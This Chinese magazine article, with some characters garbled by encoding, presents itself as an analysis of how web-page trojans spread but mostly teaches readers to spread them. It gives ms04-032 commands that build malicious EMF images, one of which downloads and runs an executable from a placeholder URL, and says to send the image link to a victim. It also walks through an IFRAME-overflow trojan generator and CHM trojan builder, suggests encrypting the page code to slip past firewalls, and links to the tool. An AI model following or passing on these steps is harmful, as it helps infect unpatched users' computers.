小劉有早起看網(wǎng)絡新聞的習慣，今天他照例打開了QQ上網(wǎng)，卻收到一個陌生人發(fā)來的圖片鏈接，對方還說該鏈接中的內(nèi)容正是這幾天被大家津津樂道的某個熱點事件，

“夾心”網(wǎng)頁你敢“吃”？

　　各式各樣的木馬程序之所以會在網(wǎng)絡上橫行，網(wǎng)頁傳播是功不可沒的。相對于其他傳播途徑，網(wǎng)頁傳播的危害面非常廣泛，而IE層出不窮的漏洞也使很多朋友在不知不覺中中招。這一期的木馬屠城，筆者就針對木馬如何被傳播出去這一問題，對最近較經(jīng)典的網(wǎng)頁木馬傳播方式進行剖析，讓大家知道這些“夾心”網(wǎng)頁中的木馬是怎樣將用戶殺于無形之中的。

　　圖形渲染漏洞

　　大家可曾想過瀏覽一個圖片文件就會中木馬，并且還不是以前的那種以“.JPEG”結(jié)尾的木馬，因為Windows又給 們爆出了一個更新的可利用漏洞。

　　在WindowsXPSP1、WindowsServer2003、windows2000SP4中，系統(tǒng)對Windows圖像文件（WMF）和增強型圖像文件（EMF）圖像格式進行的渲染存在一個遠程代碼執(zhí)行漏洞，它使得惡意攻擊者可以在受影響的系統(tǒng)上執(zhí)行遠程代碼。漏洞的利用十分簡單，我們只需要使用ms04-032溢出程序即可生成帶溢出效果的EMF圖片。

　　進入命令提示符窗口，輸入格式為“ms04-32.exe”的命令。

　　提示：溢出方式可分為“1-端口方式溢出”和“2-下載溢出”。

　　例如輸入“ms04-321.emf121”，這樣就生成了一個可以打開21端口的EMF圖片，

電腦資料

　　提示：輸入“ms04-32test.emf2http：//www.xxx.xxx/xxx.exe

　　現(xiàn)在只要把此圖片上傳到自己的空間，然后將圖片地址發(fā)給對方，沒有及時更新補丁的用戶看了圖片后就會在不知情的情況下中招。

　　IFRAME溢出型木馬

　　在這里筆者要給大家介紹的是如何讓對方通過訪問一個看似平常的網(wǎng)頁，而不知不覺地中木馬。這是網(wǎng)頁木馬傳播最主要的途徑，因為看似平常的網(wǎng)頁瀏覽，也會帶來很多嚴重的后果。

　　當IFRAME溢出公布后，網(wǎng)上就有高手針對已經(jīng)公布的惡意代碼進行了修改并寫成了專門的木馬生成器，使得它能順利地工作在Windows98、WindowsMe、Windows2000、WindowsXPSP1（IE6）等系統(tǒng)下。由于它的危害很大，安裝了IE6的電腦會受到iFrame漏洞的影響（不包括已升級到WindowsXPSP2的系統(tǒng)）。

　　運行wymmpro.exe程序后，出現(xiàn)如圖2所示的界面。首先在第一行填入已準備好的木馬程序路徑（網(wǎng)絡路徑），接下來在第二欄中選擇IE的彈出方式和自定義生成的木馬網(wǎng)頁名。建議大家選擇第一項，這樣就可防止某些系統(tǒng)攔截所彈出的窗口。

　　接下來在第三欄中選擇默認的大內(nèi)存方式（用于網(wǎng)頁木馬）。為了防止對方使用的是IE5.0/5.5而不會中招，我們可以在此生成CHM木馬來達到傳播的目的，我們只需要把準備好的木馬程序放到木馬生成器的CHM目錄下，并根據(jù)提示填寫好木馬程序名和欲生成的CHM文件名以及用來存放該CHM的網(wǎng)絡地址即可。

　　最后就是包裝工作，我們可以選擇對生成的網(wǎng)頁木馬代碼進行壓縮或加密，防止被帶網(wǎng)頁代碼監(jiān)控功能的防火墻攔截�，F(xiàn)在，一個活生生的網(wǎng)頁木馬就制作好了。

　　軟件下載地址：http：//www.sixvee.com/520yy/tools/cytkk-3.rar